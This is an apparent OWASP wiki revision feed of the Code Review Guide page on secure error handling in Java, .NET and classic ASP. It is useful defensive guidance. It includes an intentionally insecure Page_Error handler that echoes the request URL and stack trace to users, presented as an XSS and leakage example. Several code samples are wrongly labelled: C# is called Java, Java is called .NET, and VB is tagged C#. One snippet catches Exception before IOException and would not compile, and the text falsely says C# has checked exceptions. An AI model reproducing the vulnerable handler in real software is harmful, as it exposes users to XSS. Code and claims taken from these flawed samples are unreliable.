The other key area relating to error handling is the premise of &amp;quot;fail securely&amp;quot;. Errors induced should not leave the application in an insecure state. Resources should be locked down and released, sessions terminated (if required), and calculations or business logic should be halted (depending on the type of error, of course). &lt;br /&gt;
&lt;br /&gt;
An important aspect of secure application development is to prevent information leakage. Error messages give an attacker great insight into the inner workings of an application. &lt;br /&gt;
&lt;br /&gt;
''The purpose of reviewing the Error Handling code is to assure that the application fails safely under all possible error conditions, expected and unexpected. No sensitive information is presented to the user when an error occurs. ''&lt;br /&gt;
&lt;br /&gt;
For example, SQL injection is much tougher to successfully execute without some healthy error messages. It lessens the attack footprint, and an attacker would have to resort to using “blind SQL injection” which is more difficult and time consuming. &lt;br /&gt;
&lt;br /&gt;
A well-planned error/exception handling strategy is important for three reasons:&lt;br /&gt;
&lt;br /&gt;
#	Good error handling does not give an attacker any information which is a means to an end, attacking the application&lt;br /&gt;
#	A proper centralised error strategy is easier to maintain and reduces the chance of any uncaught errors “Bubbling up” to the front end of an application.&lt;br /&gt;
#	Information leakage can lead to social engineering exploits.&lt;br /&gt;
&lt;br /&gt;
Some development languages provide checked exceptions, which means that the compiler shall complain if an exception for a particular API call is not caught. Java and C# are good examples of this. Languages like C++ and C do not provide this safety net. Languages with checked exception handling still are prone to information leakage, as not all types of errors are checked for. &lt;br /&gt;
&lt;br /&gt;
When an exception or error is thrown, we also need to log this occurrence. Sometimes this is due to bad development, but it can be the result of an attack or some other service your application relies on failing. &lt;br /&gt;
&lt;br /&gt;
All code paths that can cause an exception to be thrown should check for success in order for the exception not to be thrown. &lt;br /&gt;
&lt;br /&gt;
• To avoid a NullPointerException we should check if the object being accessed is not null. &lt;br /&gt;
&lt;br /&gt;
===Error Handling Should Be Centralized if Possible===&lt;br /&gt;
&lt;br /&gt;
When reviewing code it is recommended that you assess the commonality within the application from a error/exception handling perspective. Frameworks have error handling resources which can be exploited to assist in secure programming, and such resources within the framework should be reviewed to assess if the error handling is &amp;quot;wired-up&amp;quot; correctly. &lt;br /&gt;
&lt;br /&gt;
* A generic error page should be used for all exceptions if possible. &lt;br /&gt;
&lt;br /&gt;
This prevents the attacker from identifying internal responses to error states. This also makes it more difficult for automated tools to identify successful attacks.&lt;br /&gt;
&lt;br /&gt;
'''Declarative Exception Handling'''&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;exception   key=”bank.error.nowonga” &lt;br /&gt;
                    path=”/NoWonga.jsp” &lt;br /&gt;
                    type=”mybank.account.NoCashException”/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This could be found in the struts-config.xml file, a key file when reviewing the wired-up struts environment&lt;br /&gt;
&lt;br /&gt;
===Java Servlets and JSP===&lt;br /&gt;
&lt;br /&gt;
Specification can be done in web.xml in order to handle unhandled exceptions. When Unhandled exceptions occur, but are not caught in code, the user is forwarded to a generic error page: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
       &amp;lt;exception-type&amp;gt;UnhandledException&amp;lt;/exception-type&amp;gt;&lt;br /&gt;
       &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also in the case of HTTP 404 or HTTP 500 errors during the review you may find: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
  &amp;lt;error-code&amp;gt;500&amp;lt;/error-code&amp;gt;&lt;br /&gt;
  &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Failing Securely===&lt;br /&gt;
Types of errors:&lt;br /&gt;
*The result of business logic conditions not being met.&lt;br /&gt;
*The result of the environment wherein the business logic resides fails.&lt;br /&gt;
*The result of upstream or downstream systems upon which the application depends fail.&lt;br /&gt;
*Technical hardware / physical failure.&lt;br /&gt;
&lt;br /&gt;
A failure is never expected,  but they do occur. In the event of a failure, it is important not to leave the &amp;quot;doors&amp;quot; of the application open and the keys to other &amp;quot;rooms&amp;quot; within the application sitting on the table. In the course of a logical workflow, which is designed based upon requirements, errors may occur which can be programmatically handled, such as a connection pool not being available, or a downstream server not being contactable. &lt;br /&gt;
&lt;br /&gt;
Such areas of failure should be examined during the course of the code review. It should be examined if all resources should be released in the case of a failure and during the thread of execution if there is any potential for resource leakage, resources being memory, connection pools, file handles etc. &lt;br /&gt;
&lt;br /&gt;
The review of code should also include pinpointing areas where the user session should be terminated or invalidated. Sometimes errors may occur which do not make any logical sense from a business logic perspective or a technical standpoint; &lt;br /&gt;
&lt;br /&gt;
e.g: &amp;quot;A logged in user looking to access an account which is not registered to that user and such data could not be inputted in the normal fashion.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Such conditions reflect possible malicious activity. Here we should review if the code is in any way defensive and kills the user’s session object and forwards the user to the login page. (Keep in mind that the session object should be examined upon every HTTP request).&lt;br /&gt;
&lt;br /&gt;
===Information Burial===&lt;br /&gt;
Swallowing exceptions into an empty catch() block is not advised as an audit trail of the cause of the exception would be incomplete.&lt;br /&gt;
&lt;br /&gt;
==Generic Error Messages==&lt;br /&gt;
We should use a localized description string in every exception, a friendly error reason such as “System Error – Please try again later”. When the user sees an error message, it will be derived from this description string of the exception that was thrown, and never from the exception class which may contain a stack trace, line number where the error occurred, class name, or method name. &lt;br /&gt;
&lt;br /&gt;
Do not expose sensitive information in exception messages. Information such as paths on the local file system is considered privileged information; any internal system information should be hidden from the user. As mentioned before, an attacker could use this information to gather private user information from the application or components that make up the app. &lt;br /&gt;
&lt;br /&gt;
Don’t put people’s names or any internal contact information in error messages. Don’t put any “human” information, which would lead to a level of familiarity and a social engineering exploit.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable Code==&lt;br /&gt;
&lt;br /&gt;
===JAVA===&lt;br /&gt;
IIn Java we have the concept of an error object; the Exception object. This lives in the Java package java.lang and is derived from the Throwable object. Exceptions are thrown when an abnormal occurrence has occurred. Another object derived from Throwable is the Error object, which is thrown when something more serious occurs. &lt;br /&gt;
&lt;br /&gt;
Information leakage can occur when developers use some exception methods, which ‘bubble’ to the user UI due to a poor error handling strategy. The methods are as follows: &lt;br /&gt;
&lt;br /&gt;
printStackTrace()&amp;lt;br&amp;gt;&lt;br /&gt;
getStackTrace()&lt;br /&gt;
&lt;br /&gt;
Also important to know is that the output of these methods is printed in System console, the same as System.out.println(e) where there is an Exception. Be sure to not redirect the outputStream to PrintWriter object of JSP, by convention called &amp;quot;out&amp;quot;. Ex. printStackTrace(out); &lt;br /&gt;
&lt;br /&gt;
Also another object to look at is the java.lang.system package:&lt;br /&gt;
&lt;br /&gt;
setErr() and the System.err field.&lt;br /&gt;
&lt;br /&gt;
===.NET===&lt;br /&gt;
In .NET a System.Exception object exists. Commonly used child objects such as ApplicationException and SystemException are used. It is not recommended that you throw or catch a SystemException this is thrown by runtime. &lt;br /&gt;
&lt;br /&gt;
When an error occurs, either the system or the currently executing application reports it by throwing an exception containing information about the error, similar to Java. Once thrown, an exception is handled by the application or by the default exception handler. This Exception object contains similar methods to the Java implementation such as: &lt;br /&gt;
&lt;br /&gt;
StackTrace &amp;lt;br&amp;gt;&lt;br /&gt;
Source &amp;lt;br&amp;gt;&lt;br /&gt;
Message &amp;lt;br&amp;gt;&lt;br /&gt;
HelpLink &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In .NET we need to look at the error handling strategy from the point of view of global error handling and the handling of unexpected errors. This can be done in many ways and this article is not an exhaustive list. Firstly, an Error Event is thrown when an unhandled exception is thrown. &lt;br /&gt;
&lt;br /&gt;
This is part of the TemplateControl class. &lt;br /&gt;
&lt;br /&gt;
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemWebUITemplateControlClassErrorTopic.asp&lt;br /&gt;
&lt;br /&gt;
Error handling can be done in three ways in .NET&lt;br /&gt;
&lt;br /&gt;
*In the web.config file's customErrors section. &lt;br /&gt;
*In the global.asax file's Application_Error sub. &lt;br /&gt;
*On the aspx or associated codebehind page in the Page_Error sub&lt;br /&gt;
&lt;br /&gt;
The order of error handling events in .NET is as follows: &lt;br /&gt;
#	On the Page in the Page_Error sub.&lt;br /&gt;
#	The global.asax Application_Error sub &lt;br /&gt;
#	The web.config file &lt;br /&gt;
&lt;br /&gt;
It is recommended to look in these areas to understand the error strategy of the application.&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
Unlike Java and .NET, classic ASP pages do not have structured error handling in try-catch blocks. Instead they have a specific object called &amp;quot;err&amp;quot;. This make error handling in a classic ASP pages hard to do and prone to design errors on error handlers, causing race conditions and information leakage. Also, as ASP uses VBScript (a subtract of Visual Basic), sentences like &amp;quot;On Error GoTo label&amp;quot; are not available.&lt;br /&gt;
&lt;br /&gt;
==Vulnerable Patterns for Error Handling==&lt;br /&gt;
&lt;br /&gt;
===Page_Error===&lt;br /&gt;
&lt;br /&gt;
Page_Error is page level handling which is run on the server side.&lt;br /&gt;
Below is an example but the error information is a little too informative and hence bad practice.&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;script language=&amp;quot;C#&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
 Sub Page_Error(Source As Object, E As EventArgs)&lt;br /&gt;
 Dim message As String = &amp;lt;Font Color=&amp;quot;red&amp;quot;&amp;gt;Request.Url.ToString()&amp;amp; Server.GetLastError().ToString()&amp;lt;/font&amp;gt;&lt;br /&gt;
 Response.Write(message) // display message &lt;br /&gt;
 End Sub&lt;br /&gt;
  &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The text in the example above has a number of issues: Firstly, it redisplays the HTTP request to the user in the form of Request.Url.ToString() Assuming there has been no data validation prior to this point, we are vulnerable to cross site scripting attacks!! Secondly, the error message and stack trace is displayed to the user using Server.GetLastError().ToString() which divulges internal information regarding the application. &lt;br /&gt;
&lt;br /&gt;
After the Page_Error is called, the Application_Error sub is called.&lt;br /&gt;
&lt;br /&gt;
===Global.asax===&lt;br /&gt;
&lt;br /&gt;
When an error occurs, the Application_Error sub is called. In this method we can log the error and redirect to another page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;%@ Import Namespace=&amp;quot;System.Diagnostics&amp;quot; %&amp;gt;&lt;br /&gt;
   &amp;lt;script language=&amp;quot;C#&amp;quot; runat=&amp;quot;server&amp;quot;&amp;gt;&lt;br /&gt;
     void Application_Error(Object sender, EventArgs e) {&lt;br /&gt;
          String Message = &amp;quot;\n\nURL: http://localhost/&amp;quot; + Request.Path&lt;br /&gt;
                           + &amp;quot;\n\nMESSAGE:\n &amp;quot; + Server.GetLastError().Message&lt;br /&gt;
                           + &amp;quot;\n\nSTACK TRACE:\n&amp;quot; + Server.GetLastError().StackTrace;&lt;br /&gt;
          // Insert into Event Log&lt;br /&gt;
          EventLog Log = new EventLog();&lt;br /&gt;
          Log.Source = LogName;&lt;br /&gt;
          Log.WriteEntry(Message, EventLogEntryType.Error);&lt;br /&gt;
        Server.Redirect(Error.htm) // this shall also clear the error&lt;br /&gt;
     }&lt;br /&gt;
 &amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Above is an example of code in Global.asax and the Application_Error method. The error is logged and then the user is redirected. Unvalidated parameters are being logged here in the form of Request.Path. Care must be taken not to log or redisplay unvalidated input from any external source.&lt;br /&gt;
&lt;br /&gt;
===Web.config===&lt;br /&gt;
Web.config has custom error tags which can be used to handle errors. This is called last and if Page_error or Application_error is called and has functionality, that functionality shall be executed first. As long as the previous two handling mechanisms do not redirect or clear (Response.Redirect or a Server.ClearError), this will be called and you shall be forwarded to the page defined in web.config. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors defaultRedirect=&amp;quot;error.html&amp;quot; mode=&amp;quot;On|Off|RemoteOnly&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;error statusCode=&amp;quot;statuscode&amp;quot; redirect=&amp;quot;url&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The “On&amp;quot; directive means that custom errors are enabled. If no defaultRedirect is specified, users see a generic error. The &amp;quot;Off&amp;quot; directive means that custom errors are disabled. This allows the displaying of detailed errors. &amp;quot;RemoteOnly&amp;quot; specifies that custom errors are shown only to remote clients, and ASP.NET errors are shown to the local host. This is the default. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;customErrors mode=&amp;quot;On&amp;quot; defaultRedirect=&amp;quot;error.html&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;500&amp;quot; redirect=&amp;quot;err500.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;404&amp;quot; redirect=&amp;quot;notHere.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;error statusCode=&amp;quot;403&amp;quot; redirect=&amp;quot;notAuthz.aspx&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/customErrors&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Leading Practice for Error Handling ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Try &amp;amp; Catch (Java/ .NET)===&lt;br /&gt;
Code that might throw exceptions should be in a try block and code that handles exceptions in a catch block. The catch block is a series of statements beginning with the keyword catch, followed by an exception type and an action to be taken. These are very similar in Java and .NET &lt;br /&gt;
&lt;br /&gt;
'''Example:'''&lt;br /&gt;
&lt;br /&gt;
'''Java Try-Catch:'''&lt;br /&gt;
&lt;br /&gt;
 public class DoStuff {&lt;br /&gt;
     public static void Main() {&lt;br /&gt;
         try {&lt;br /&gt;
             StreamReader sr = File.OpenText(&amp;quot;stuff.txt&amp;quot;);&lt;br /&gt;
             Console.WriteLine(&amp;quot;Reading line {0}&amp;quot;, sr.ReadLine());    &lt;br /&gt;
         }&lt;br /&gt;
         catch(Exception e) {&lt;br /&gt;
             Console.WriteLine(&amp;quot;An error occurred. Please leave to room”);&lt;br /&gt;
 	 logerror(“Error: “, e);&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''.NET Try–Catch'''&lt;br /&gt;
&lt;br /&gt;
 public void run() {&lt;br /&gt;
             while (!stop) {&lt;br /&gt;
                 try {&lt;br /&gt;
 &lt;br /&gt;
                     // Perform work here&lt;br /&gt;
 &lt;br /&gt;
                 } catch (Throwable t) {&lt;br /&gt;
                     // Log the exception and continue&lt;br /&gt;
 		WriteToUser(“An Error has occurred, put the kettle on”);&lt;br /&gt;
                     logger.log(Level.SEVERE, &amp;quot;Unexception exception&amp;quot;, t);&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
&lt;br /&gt;
In general, it is best practice to catch a specific type of exception rather than use the basic catch(Exception) or catch(Throwable) statement in the case of Java. &lt;br /&gt;
&lt;br /&gt;
In classic ASP there are two ways to do error handling, the first is using the err object with an On Error Resume Next.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 Public Function IsInteger (ByVal Number)	 &lt;br /&gt;
   Dim Res, tNumber&lt;br /&gt;
   Number = Trim(Number)&lt;br /&gt;
   tNumber=Number		&lt;br /&gt;
   On Error Resume Next	                     'If an error occurs continue execution&lt;br /&gt;
   Number = CInt(Number) 	             'if Number is a alphanumeric string a Type Mismatch error will occur&lt;br /&gt;
   Res = (err.number = 0) 	             'If there are no errors then return true&lt;br /&gt;
   On Error GoTo 0			     'If an error occurs stop execution and display error&lt;br /&gt;
   re.Pattern = &amp;quot;^[\+\-]? *\d+$&amp;quot;	     'only one +/- and digits are allowed&lt;br /&gt;
   IsInteger = re.Test(tNumber) And Res&lt;br /&gt;
 End Function&lt;br /&gt;
 &lt;br /&gt;
The second is using an error handler on an error page (http://support.microsoft.com/kb/299981).&lt;br /&gt;
 &lt;br /&gt;
 Dim ErrObj&lt;br /&gt;
 set ErrObj = Server.GetLastError()&lt;br /&gt;
 'Now use ErrObj as the regular err object&lt;br /&gt;
&lt;br /&gt;
===Releasing resources and good housekeeping===&lt;br /&gt;
If the language in question has a finally method, use it. The finally method is guaranteed to always be called. The finally method can be used to release resources referenced by the method that threw the exception. This is very important. An example would be if a method gained a database connection from a pool of connections, and an exception occurred without finally, the connection object shall not be returned to the pool for some time (until the timeout). This can lead to pool exhaustion. finally() is called even if no exception is thrown. &lt;br /&gt;
&lt;br /&gt;
 try {&lt;br /&gt;
        System.out.println(&amp;quot;Entering try statement&amp;quot;);&lt;br /&gt;
        out = new PrintWriter(new FileWriter(&amp;quot;OutFile.txt&amp;quot;));&lt;br /&gt;
      //Do Stuff….&lt;br /&gt;
 &lt;br /&gt;
    } catch (Exception e) {&lt;br /&gt;
        System.err.println(&amp;quot;Error occurred!”);&lt;br /&gt;
 &lt;br /&gt;
    } catch (IOException e) {&lt;br /&gt;
        System.err.println(&amp;quot;Input exception &amp;quot;);&lt;br /&gt;
 &lt;br /&gt;
    } finally {&lt;br /&gt;
 &lt;br /&gt;
        if (out != null) { &lt;br /&gt;
            out.close(); // RELEASE RESOURCES&lt;br /&gt;
        } &lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
A Java example showing finally() being used to release system resources.&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For Classic ASP pages it is recommended to enclose all cleaning in a function and call it into an error handling statement after an &amp;quot;On Error Resume Next&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
===Centralised exception handling (Struts Example)===&lt;br /&gt;
Building an infrastructure for consistent error reporting proves more difficult than error handling. Struts provides the ActionMessages and ActionErrors classes for maintaining a stack of error messages to be reported, which can be used with JSP tags like &amp;lt;html: error&amp;gt; to display these error messages to the user. &lt;br /&gt;
&lt;br /&gt;
To report a different severity of a message in a different manner (like error, warning, or information) the following tasks are required: &lt;br /&gt;
&lt;br /&gt;
# Register, instantiate the errors under the appropriate severity&lt;br /&gt;
# Identify these messages and show them in a consistent manner.&lt;br /&gt;
&lt;br /&gt;
Struts ActionErrors class makes error handling quite easy:&lt;br /&gt;
&lt;br /&gt;
 ActionErrors errors = new ActionErrors()&lt;br /&gt;
 errors.add(&amp;quot;fatal&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;error&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 errors.add(&amp;quot;warning&amp;quot;, new ActionError(&amp;quot;....&amp;quot;));&lt;br /&gt;
 errors.add(&amp;quot;information&amp;quot;, new ActionError(&amp;quot;....&amp;quot;)); &lt;br /&gt;
 saveErrors(request,errors); // Important to do this&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Now that we have added the errors, we display them by using tags in the HTML page. &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;logic:messagePresent property=&amp;quot;error&amp;quot;&amp;gt; &lt;br /&gt;
 &amp;lt;html:messages property=&amp;quot;error&amp;quot; id=&amp;quot;errMsg&amp;quot; &amp;gt;&lt;br /&gt;
     &amp;lt;bean:write name=&amp;quot;errMsg&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;/html:messages&amp;gt;&lt;br /&gt;
 &amp;lt;/logic:messagePresent &amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
For classic ASP pages you need to do some IIS configuration, follow the same link for more information http://support.microsoft.com/kb/299981&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60155</id>
		<title>Codereview-Error-Handling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Codereview-Error-Handling&amp;diff=60155"/>
				<updated>2009-05-05T12:09:37Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* JAVA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;br /&gt;
&lt;br /&gt;
==Error Handling==&lt;br /&gt;
Error Handling is important in a number of ways. It may affect the state of the application, or leak system information to a user. The initial failure to cause the error may cause the application to traverse into an insecure state. Weak error handling also aids the attacker, as the errors returned may assist them in constructing correct attack vectors. A generic error page for most errors is recommended when developing code. This approach makes it more difficult for attackers to identify signatures of potentially successful attacks. There are methods which can circumvent systems with leading practice error handling semantics which should be kept in mind; Attacks such as blind SQL injection using booleanization or response time characteristics can be used to address such generic responses. &lt;br /&gt;
&lt;br /&gt;
The other key area relating to error handling is the premise of &amp;quot;fail securely&amp;quot;. Errors induced should not leave the application in an insecure state. Resources should be locked down and released, sessions terminated (if required), and calculations or business logic should be halted (depending on the type of error, of course). &lt;br /&gt;
&lt;br /&gt;
An important aspect of secure application development is to prevent information leakage. Error messages give an attacker great insight into the inner workings of an application. &lt;br /&gt;
&lt;br /&gt;
''The purpose of reviewing the Error Handling code is to assure that the application fails safely under all possible error conditions, expected and unexpected. No sensitive information is presented to the user when an error occurs. ''&lt;br /&gt;
&lt;br /&gt;
For example, SQL injection is much tougher to successfully execute without some healthy error messages. It lessens the attack footprint, and an attacker would have to resort to using “blind SQL injection” which is more difficult and time consuming. &lt;br /&gt;
&lt;br /&gt;
A well-planned error/exception handling strategy is important for three reasons:&lt;br /&gt;
&lt;br /&gt;
#	Good error handling does not give an attacker any information which is a means to an end, attacking the application&lt;br /&gt;
#	A proper centralised error strategy is easier to maintain and reduces the chance of any uncaught errors “Bubbling up” to the front end of an application.&lt;br /&gt;
#	Information leakage can lead to social engineering exploits.&lt;br /&gt;
&lt;br /&gt;
Some development languages provide checked exceptions, which means that the compiler shall complain if an exception for a particular API call is not caught. Java and C# are good examples of this. Languages like C++ and C do not provide this safety net. Languages with checked exception handling still are prone to information leakage, as not all types of errors are checked for. &lt;br /&gt;
&lt;br /&gt;
When an exception or error is thrown, we also need to log this occurrence. Sometimes this is due to bad development, but it can be the result of an attack or some other service your application relies on failing. &lt;br /&gt;
&lt;br /&gt;
All code paths that can cause an exception to be thrown should check for success in order for the exception not to be thrown. &lt;br /&gt;
&lt;br /&gt;
• To avoid a NullPointerException we should check if the object being accessed is not null. &lt;br /&gt;
&lt;br /&gt;
===Error Handling Should Be Centralized if Possible===&lt;br /&gt;
&lt;br /&gt;
When reviewing code it is recommended that you assess the commonality within the application from a error/exception handling perspective. Frameworks have error handling resources which can be exploited to assist in secure programming, and such resources within the framework should be reviewed to assess if the error handling is &amp;quot;wired-up&amp;quot; correctly. &lt;br /&gt;
&lt;br /&gt;
* A generic error page should be used for all exceptions if possible. &lt;br /&gt;
&lt;br /&gt;
This prevents the attacker from identifying internal responses to error states. This also makes it more difficult for automated tools to identify successful attacks.&lt;br /&gt;
&lt;br /&gt;
'''Declarative Exception Handling'''&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;exception   key=”bank.error.nowonga” &lt;br /&gt;
                    path=”/NoWonga.jsp” &lt;br /&gt;
                    type=”mybank.account.NoCashException”/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This could be found in the struts-config.xml file, a key file when reviewing the wired-up struts environment&lt;br /&gt;
&lt;br /&gt;
===Java Servlets and JSP===&lt;br /&gt;
&lt;br /&gt;
Specification can be done in web.xml in order to handle unhandled exceptions. When Unhandled exceptions occur, but are not caught in code, the user is forwarded to a generic error page: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
       &amp;lt;exception-type&amp;gt;UnhandledException&amp;lt;/exception-type&amp;gt;&lt;br /&gt;
       &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Also in the case of HTTP 404 or HTTP 500 errors during the review you may find: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;error-page&amp;gt;&lt;br /&gt;
  &amp;lt;error-code&amp;gt;500&amp;lt;/error-code&amp;gt;&lt;br /&gt;
  &amp;lt;location&amp;gt;GenericError.jsp&amp;lt;/location&amp;gt;&lt;br /&gt;
 &amp;lt;/error-page&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Failing Securely===&lt;br /&gt;
Types of errors:&lt;br /&gt;
*The result of business logic conditions not being met.&lt;br /&gt;
*The result of the environment wherein the business logic resides fails.&lt;br /&gt;
*The result of upstream or downstream systems upon which the application depends fail.&lt;br /&gt;
*Technical hardware / physical failure.&lt;br /&gt;
&lt;br /&gt;
A failure is never expected,  but they do occur. In the event of a failure, it is important not to leave the &amp;quot;doors&amp;quot; of the application open and the keys to other &amp;quot;rooms&amp;quot; within the application sitting on the table. In the course of a logical workflow, which is designed based upon requirements, errors may occur which can be programmatically handled, such as a connection pool not being available, or a downstream server not being contactable. &lt;br /&gt;
&lt;br /&gt;
Such areas of failure should be examined during the course of the code review. It should be examined if all resources should be released in the case of a failure and during the thread of execution if there is any potential for resource leakage, resources being memory, connection pools, file handles etc. &lt;br /&gt;
&lt;br /&gt;
The review of code should also include pinpointing areas where the user session should be terminated or invalidated. Sometimes errors may occur which do not make any logical sense from a business logic perspective or a technical standpoint; &lt;br /&gt;
&lt;br /&gt;
e.g: &amp;quot;A logged in user looking to access an account which is not registered to that user and such data could not be inputted in the normal fashion.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Such conditions reflect possible malicious activity. Here we should review if the code is in any way defensive and kills the user’s session object and forwards the user to the login page. (Keep in mind that the session object should be examined upon every HTTP request).&lt;br /&gt;
&lt;br /&gt;
===Information Burial===&lt;br /&gt;
Swallowing exceptions into an empty catch() block is not advised as an audit trail of the cause of the exception would be incomplete.&lt;br /&gt;
&lt;br /&gt;
==Generic Error Messages==&lt;br /&gt;
We should use a localized description string in every exception, a friendly error reason such as “System Error – Please try again later”. When the user sees an error message, it will be derived from this description string of the exception that was thrown, and never from the exception class which may contain a stack trace, line number where the error occurred, class name, or method name. &lt;br /&gt;
&lt;br /&gt;
Do not expose sensitive information in exception messages. Information such as paths on the local file system is considered privileged information; any internal system information should be hidden from the user. As mentioned before, an attacker could use this information to gather private user information from the application or components that make up the app. &lt;br /&gt;
&lt;br /&gt;
Don’t put people’s names or any internal contact information in error messages. Don’t put any “human” information, which would lead to a level of familiarity and a social engineering exploit.&lt;br /&gt;
&lt;br /&gt;
==How to Locate the Potentially Vulnerable Code==&lt;br /&gt;
&lt;br /&gt;
===JAVA===&lt;br /&gt;
IIn Java we have the concept of an error object; the Exception object. This lives in the Java package java.lang and is derived from the Throwable object. Exceptions are thrown when an abnormal occurrence has occurred. Another object derived from Throwable is the Error object, which is thrown when something more serious occurs. &lt;br /&gt;
&lt;br /&gt;
Information leakage can occur when developers use some exception methods, which ‘bubble’ to the user UI due to a poor error handling strategy. The methods are as follows: &lt;br /&gt;
&lt;br /&gt;
printStackTrace()&amp;lt;br&amp;gt;&lt;br /&gt;
getStackTrace()&lt;br /&gt;
&lt;br /&gt;
Also important to know is that the output of these methods is printed in System console, the same as System.out.println(e) where there is an Exception. Be sure to not redirect the outputStream to PrintWriter object of JSP, by convention called &amp;quot;out&amp;quot;. Ex. printStackTrace(out); &lt;br /&gt;
&lt;br /&gt;
Also another object to look at is the java.lang.system package:&lt;br /&gt;
&lt;br /&gt;
setErr() and the System.err field.&lt;br /&gt;
&lt;br /&gt;
===.NET===&lt;br /&gt;
In .NET a System.Exception object exists. Commonly used child objects such as ApplicationException and SystemException are used. It is not recommended that you throw or catch a SystemException this is thrown by runtime. &lt;br /&gt;
&lt;br /&gt;
When an error occurs, either the system or the currently executing application reports it by throwing an exception containing information about the error, similar to Java. Once thrown, an exception is handled by the application or by the default exception handler. This Exception object contains similar methods to the Java implementation such as: &lt;br /&gt;
&lt;br /&gt;
StackTrace &amp;lt;br&amp;gt;&lt;br /&gt;
Source &amp;lt;br&amp;gt;&lt;br /&gt;
Message &amp;lt;br&amp;gt;&lt;br /&gt;
HelpLink &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In .NET we need to look at the error handling strategy from the point of view of global error handling and the handling of unexpected errors. This can be done in many ways and this article is not an exhaustive list. Firstly, an Error Event is thrown when an unhandled exception is thrown. &lt;br /&gt;
&lt;br /&gt;
This is part of the TemplateControl class. &lt;br /&gt;
&lt;br /&gt;
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cpref/html/frlrfSystemWebUITemplateControlClassErrorTopic.asp&lt;br /&gt;
&lt;br /&gt;
Error handling can be done in three ways in .NET&lt;br /&gt;
&lt;br /&gt;
*In the web.config file's customErrors section. &lt;br /&gt;
*In the global.asax file's Application_Error sub. &lt;br /&gt;
*On the aspx or associated codebehind page in the Page_Error sub&lt;br /&gt;
&lt;br /&gt;
The order of error handling events in .NET is as follows: &lt;br /&gt;
#	On the Page in the Page_Error sub.&lt;br /&gt;
#	The global.asax Application_Error sub &lt;br /&gt;
#	The web.config file &lt;br /&gt;
&lt;br /&gt;
It is recommended to look in these areas to understand the error strategy of the application.&lt;br /&gt;
&lt;br /&gt;
===Classic ASP===&lt;br /&gt;
Unlike Java and .NET, classic ASP pages do not have structured error handling in try-catch blocks. Instead they have a specific object called &amp;quot;err&amp;quot;. This make error handling in a classic ASP pages hard to do and prone to design errors on error handlers, causing race conditions and information leakage. Also, as ASP uses VBScript (a subtract of Visual Basic), sentences like &amp;quot;On Error GoTo label&amp;quot; are not available.&lt;br /&gt;
&lt;br /&gt;
